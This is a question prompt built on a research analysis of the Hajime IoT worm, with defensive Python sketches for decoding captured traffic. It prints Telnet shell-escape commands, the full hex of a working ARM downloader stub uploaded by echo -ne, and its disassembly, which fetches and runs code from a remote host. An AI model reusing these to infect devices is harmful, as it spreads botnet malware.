Question
Background
On Sep. 30, 2016, the source code for Mirai, a prolific internet worm/botnet targeting
embedded/IoT Linux devices, was released on the website hackforums.com by its author, an
individual known only by the pseudonym Anna-senpai.1 Because Anna-senpai had claimed that
Mirai had infected over 380,000 devices, and that the malware had been responsible for a
record 620 Gbps distributed denial-of-service (DDoS) attack, the computer security community
very quickly took an interest in examining the source code and understanding Mirai's operation.
The Security Research Group (SRG) at Rapidity Networks, Inc. also took an interest in
understanding the Mirai worm, and after completing its initial examination of the released source
code, set out to capture a sample in the wild. To do this, the SRG deployed a network of
medium-interaction honeypots (computer systems intended to attract malicious activity for
information-gathering purposes) configured to mimic a vulnerable IoT device of the sort Mirai
infects, in the hopes that a live Mirai node would soon discover the honeypot system and
attempt to conscript it.
On Oct. 5, 2016, a node within the honeypot network reported internet activity that very closely
resembled the reconnaissance and infection behaviors of Mirai. However, upon closer analysis,
the SRG discovered that the sample it had captured was not Mirai, but rather something
considerably more sophisticated. The SRG conducted online searches in an attempt to identify
its unknown specimen, but could not find any indication that this particular worm had yet been
discovered by the broader security community.
Because this worm very closely mimics the discovery and attack phases of Mirai, a worm
named for the Japanese word for "future," the SRG researchers affectionately gave this sample
the moniker of Hajime, Japanese for "beginning."
Like many internet worms, the Hajime malware has a lifecycle. A Hajime infection begins when
a node already in the Hajime network, scanning random IPv4 addresses on the public
internet, discovers a device which accepts connections on TCP port 23, the designated port for
the Telnet service. The attacking Hajime node attempts several username and password
combinations from its hardcoded list of credentials and, upon being granted entry, examines the
target system and begins its infection in stages. The first stage is a small, short-lived file-transfer
program which connects back to the attacking node and copies down a much larger download
program. The download program (the second stage) joins a peer-to-peer decentralized network
and retrieves its configuration and a scanning program. The scanning program searches the
public internet for more vulnerable systems to infect, thus continuing the lifecycle.
Stage 0: Reconnaissance and infection phase
This stage occurs completely over the initial Telnet session and does not actually involve an
uploaded binary. As such, we have opted to call this stage 0, because while it is important in
establishing a foothold in a vulnerable device, there is no actual malware present on the device
yet. All logic for stage 0 is actually implemented in the attacking node.
An attacking node scans the IPv4 address space at random. It repeatedly generates random
IPv4 addresses, attempts to connect to them on port 23, and attempts to log in by sequentially
going through a table of username/password credential pairs.
After each pair of credentials, Hajime waits for a response from the target device. If the
credentials are rejected, Hajime closes the current connection, reconnects, and tries the next
pair. While many of these credential pairs can also be found in Mirai (i.e. their hardcoded credentials
lists are similar), the two worms differ in their login behavior: Hajime follows its credentials list sequentially,
while Mirai makes login attempts in a weighted random order.
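The difference in ordering can be illustrated with a minimal Python sketch. The credential table, its weights, and both function names are hypothetical placeholders, and drawing with replacement is an assumption; neither worm's actual selection code is reproduced here.

```python
import random

# Hypothetical placeholder table: (username, password, weight).
CREDENTIALS = [
    ("user-a", "pass-a", 10),
    ("user-b", "pass-b", 5),
    ("user-c", "pass-c", 1),
]


def sequential_order(table):
    """Yield pairs in table order, as the text describes for Hajime."""
    for user, password, _weight in table:
        yield (user, password)


def weighted_random_order(table, attempts, rng=None):
    """Yield `attempts` pairs drawn at random, biased by weight.

    Draws are made with replacement, which is an assumption of this sketch.
    """
    rng = rng or random.Random()
    pairs = [(user, password) for user, password, _weight in table]
    weights = [weight for _user, _password, weight in table]
    for pair in rng.choices(pairs, weights=weights, k=attempts):
        yield pair
```

For a honeypot operator, the practical consequence is that a sequential scanner presents the same pairs in the same order on every visit, while a weighted-random one does not.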
Once a successful username/password combination is found, Hajime attempts to get access to
a Linux shell by sending the following 5 lines:
enable
system
shell
sh
/bin/busybox ECCHI
The first 4 lines are sent in a blind attempt to navigate whatever vendor-specific command-line
interface (CLI) the Telnet server implements. enable is a common CLI command to allow access
to privileged-mode commands. system attempts to navigate to a menu of system-management
options. shell and sh attempt to run a Bourne shell. If any command fails, it will fail
The purpose of the final /bin/busybox ECCHI line is to test that a Linux shell has actually been
started. A proprietary CLI is likely to reject the command, but a legitimate Linux shell would
execute Busybox, which will reject the argument with ECCHI: applet not found, letting Hajime
know that it has a bona fide Linux shell.
Once Hajime has confirmed its access to the target device's shell, it begins analyzing the target
device. First, it checks the system mounts for a writeable location in the target filesystem:
# cat /proc/mounts; /bin/busybox ECCHI
Note the repeat of the venerable /bin/busybox ECCHI command, which serves a purpose not
dissimilar to its use before: Hajime and Mirai both use the ECCHI: applet not found signature to
find the end of the command line's output.
Hajime picks the first writeable path that is not /proc, /sys, or / and uses that as its working path.
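From an analyst's side, the marker handling and the mount selection just described can be sketched in Python as follows. The function names and the sample mount table are illustrative assumptions, and matching the excluded paths exactly (rather than by prefix) is also an assumption; the text only states the rule, not how it is implemented.

```python
MARKER = "ECCHI: applet not found"


def split_outputs(session_text):
    """Split captured shell output into per-command chunks at each marker."""
    chunks = session_text.split(MARKER)
    # Whatever follows the final marker is incomplete output or a prompt.
    return [chunk.strip() for chunk in chunks[:-1]]


def pick_working_dir(mounts_text, excluded=("/proc", "/sys", "/")):
    """Return the first read-write mount point not in `excluded`, or None."""
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # not a well-formed /proc/mounts entry
        mount_point = fields[1]
        options = fields[3].split(",")
        if "rw" in options and mount_point not in excluded:
            return mount_point
    return None


# Made-up session capture: a mount table followed by the end marker.
sample = (
    "rootfs / rootfs rw 0 0\n"
    "proc /proc proc rw,relatime 0 0\n"
    "sysfs /sys sysfs rw,relatime 0 0\n"
    "tmpfs /var tmpfs rw,relatime 0 0\n"
    "/dev/root /rom squashfs ro,relatime 0 0\n"
    "ECCHI: applet not found\n"
)
print(pick_working_dir(split_outputs(sample)[0]))  # /var
```

A honeypot that wants to steer the worm toward a particular directory only needs to control the order and options of the entries it returns for /proc/mounts.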
The command sequence Hajime runs next serves multiple purposes. First, it tests if there's already a stage1 binary present.
Second, it tests that the chosen working directory really is writeable. Finally, it retrieves the
/bin/echo binary so that Hajime can inspect its header to determine the target's processor
architecture. Once the target processor is determined, Hajime uploads and executes the stage1
binary:
# echo -ne
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\
x00\x54\x00\x01\x00\x34\x00\x00\x00\x44\x01\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x2
8\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" > .s; /bin/busybox
ECCHI
# echo -ne
"\x00\x00\x01\x00\xf8\x00\x00\x00\xf8\x00\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x02\x00\xa0\
xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x9
0\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x07\x00\x2d\xe9\x03\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x4f\x4f\x4d\
xe2\x05\x50\x45\xe0\x06\x00\xa0\xe1\x04\x10\xa0\xe1\x4b\x2f\xa0\xe3\x01\x3c\xa0\xe3\x0f\x00\x2
d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x00\x50\x85\xe0\x00\x00\x50\xe3\x04\x00\x00\xda\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x04\x10\xa0\
xe1\x04\x00\x90\xef\xee\xff\xff\xea\x4f\xdf\x8d\xe2\x00\x00\x40\xe0\x01\x70\xa0\xe3\x00\x00\x0
0\xef\x02\x00\x12\x1c\xc6\x33\x64\x7b\x41\x2a\x00\x00\x00\x61\x65\x61" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x62\x69\x00\x01\x20\x00\x00\x00\x05\x43\x6f\x72\x74\x65\x78\x2d\x41\x35\x00\x06\x0a\x07\x41\
x08\x01\x09\x02\x0a\x03\x0c\x01\x2a\x01\x44\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2
e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x74\x65\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x0
0\x00\x01\x00\x00\x00\x06\x00\x00\x00\x54\x00\x01\x00\x54\x00\x00\x00" >> .s; /bin/busybox
ECCHI
# echo -ne
"\xa4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\
x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x0
0\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x23\x01\x00\x00\x21\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s; /bin/busybox ECCHI
# cp .s .i; >.i; ./.s>.i; ./.i; rm .s; /bin/busybox ECCHI
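Both the header inspection described above and the uploaded payload can be examined with a few lines of Python. The sketch below decodes the \xNN escapes from a logged echo -ne argument and reads the ELF identification bytes and e_machine field; the function names and the small machine-name table are assumptions made for illustration, and wrapped log lines need to be joined before decoding.

```python
import re
import struct

# A few common e_machine values from the ELF specification.
E_MACHINE_NAMES = {3: "x86", 8: "MIPS", 20: "PowerPC", 40: "ARM", 62: "x86-64"}


def decode_echo_payload(escaped):
    """Turn the hex escapes of an `echo -ne` argument into raw bytes."""
    hex_pairs = re.findall(r"\\x([0-9a-fA-F]{2})", escaped)
    return bytes(int(pair, 16) for pair in hex_pairs)


def elf_machine(data):
    """Return the architecture name recorded in an ELF header."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    # e_ident[EI_DATA] (byte 5): 1 = little-endian, 2 = big-endian.
    endian = "<" if data[5] == 1 else ">"
    # e_machine is a 16-bit field at offset 18.
    (machine,) = struct.unpack_from(endian + "H", data, 18)
    return E_MACHINE_NAMES.get(machine, "unknown (%d)" % machine)


# First 20 bytes of the first chunk shown above.
first_chunk = (
    r"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    r"\x02\x00\x28\x00"
)
print(elf_machine(decode_echo_payload(first_chunk)))  # ARM
```

Applied to the upload above, this identifies the stub as a little-endian ARM executable, which matches the disassembly that follows.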
Stage 1: Downloader stub
The above binary is a 484-byte ELF program. The intuitive thing, of course, is to run this through
a disassembler:
.text:00010054                 AREA .text, CODE
.text:00010054                 ; ORG 0x10054
.text:00010054                 CODE32
.text:00010054                 MOV     R0, #2
.text:00010058                 MOV     R1, #1
.text:0001005C                 MOV     R2, #6
.text:00010060                 STMFD   SP!, {R0-R2}
.text:00010064                 MOV     R0, #1
.text:00010068                 MOV     R1, SP
.text:0001006C                 SVC     0x900066        ; socketcall (socket)
.text:00010070                 ADD     SP, SP, #0xC
.text:00010074                 MOV     R6, R0
.text:00010078                 ADR     R1, sa_server
.text:0001007C                 MOV     R2, #0x10
.text:00010080                 STMFD   SP!, {R0-R2}
.text:00010084                 MOV     R0, #3
.text:00010088                 MOV     R1, SP
.text:0001008C                 SVC     0x900066        ; socketcall (connect)
.text:00010090                 ADD     SP, SP, #0x14
.text:00010094                 SUB     R4, SP, #0x13C
.text:00010098                 SUB     R5, R5, R5
.text:0001009C
.text:0001009C loc_1009C                               ; CODE XREF: .text:000100DC j
.text:0001009C                 MOV     R0, R6
.text:000100A0                 MOV     R1, R4
.text:000100A4                 MOV     R2, #0x12C
.text:000100A8                 MOV     R3, #0x100
.text:000100AC                 STMFD   SP!, {R0-R3}
.text:000100B0                 MOV     R0, #0xA
.text:000100B4                 MOV     R1, SP
.text:000100B8                 SVC     0x900066        ; socketcall (recv)
.text:000100BC                 ADD     SP, SP, #0x10
.text:000100C0                 ADD     R5, R5, R0
.text:000100C4                 CMP     R0, #0
.text:000100C8                 BLE     loc_100E0
.text:000100CC                 MOV     R2, R0
.text:000100D0                 MOV     R0, #1          ; stdout
.text:000100D4                 MOV     R1, R4
.text:000100D8                 SVC     0x900004        ; write
.text:000100DC                 B       loc_1009C
.text:000100E0 ; ---------------------------------------------------------------------------
.text:000100E0
.text:000100E0 loc_100E0                               ; CODE XREF: .text:000100C8 j
.text:000100E0                 ADD     SP, SP, #0x13C
.text:000100E4                 SUB     R0, R0, R0
.text:000100E8                 MOV     R7, #1
.text:000100EC                 SVC     0               ; exit
.text:000100EC ; ---------------------------------------------------------------------------
.text:000100F0 sa_server       DCW 2                   ; DATA XREF: .text:00010078o
.text:000100F0                                         ; AF_INET
.text:000100F2                 DCW 0x1C12              ; port 4636
.text:000100F4                 DCD 0x7B6433C6          ; address 198.51.100.123
.text:000100F4 ; .text ends
This program serves a very simple purpose: establish a TCP connection back to the attacking
host and write all received bytes out to stdout, where it gets piped to the .i file and executed.
What's striking about this program is that it's hand-written specifically for this platform. As we will
show later, Hajime is a multi-platform worm, and creating hand-crafted assembly programs for
each supported platform is a task involving significant effort.
The stub connects to a hardcoded IP address and port, rather than implement command-line
parsing logic. This means the Hajime attack code needs to know the offset to the embedded
sockaddr_in structure, for each of its stubs, for each of its platforms.
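Reading the embedded structure back out of a captured stub is straightforward. The Python sketch below decodes the eight bytes found at sa_server in the listing above; the function name is hypothetical, and reading sin_family as little-endian is an assumption that matches this ARM sample but would need adjusting for a big-endian stub.

```python
import socket
import struct


def decode_sockaddr_in(raw):
    """Decode the family, port and IPv4 address of a Linux sockaddr_in."""
    if len(raw) < 8:
        raise ValueError("need at least 8 bytes")
    # sin_family is stored in host byte order (little-endian assumed here).
    (family,) = struct.unpack_from("<H", raw, 0)
    # sin_port and sin_addr are always stored in network byte order.
    (port,) = struct.unpack_from("!H", raw, 2)
    address = socket.inet_ntoa(raw[4:8])
    return family, port, address


# The eight bytes at sa_server (0x100F0) in the stub shown above.
raw = bytes.fromhex("0200121cc633647b")
print(decode_sockaddr_in(raw))  # (2, 4636, '198.51.100.123')
```

The port is stored in network byte order, which is why the disassembler shows the halfword as 0x1C12 while the actual port is 0x121C (4636).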
Our honeypots do not execute untrusted binary code, so they did not automatically download
the stage2 binary. However, our researchers were able to catch and disassemble a fresh stage1
binary fast enough to get the IP:port information from an attacking host before it closed its TCP
socket.
Hajime does not verify that connections to its malware distribution port are originating from
attacked hosts. This allowed the SRG researchers to connect later and download the stage2
binary at their leisure.
Stage 2: DHT downloader
The stage 2 binary is the second and final stage of the Hajime worm. It is responsible for
retrieving and executing any additional payloads retrieved off the P2P network that the malware
authors have established. The P2P network is built upon several protocols used in BitTorrent.2
Structure
This stage is statically-linked. The SRG quickly identified several of the libraries that the author
had chosen for inclusion:
For information exchange, Hajime piggybacks on BitTorrent's DHT overlay network. For this, the
author linked against a heavily modified variant of the Kademlia implementation found in
KadNode.7 To transfer files with its peers, Hajime uses the uTP implementation found in libutp.8
Hajime downloads files in a custom format which often contain payloads compressed with the
LZ4 algorithm, and thus includes the decompression function from the LZ4 project.9
Through function call signature fingerprinting and by identifying functions by their logic, SRG
researchers mapped out most of the primary and auxiliary functions for
these libraries to better understand how they are used by Hajime.
Write up a complete synopsis of the Hajime malware in your own words: what it does, how it works, and where it did damage.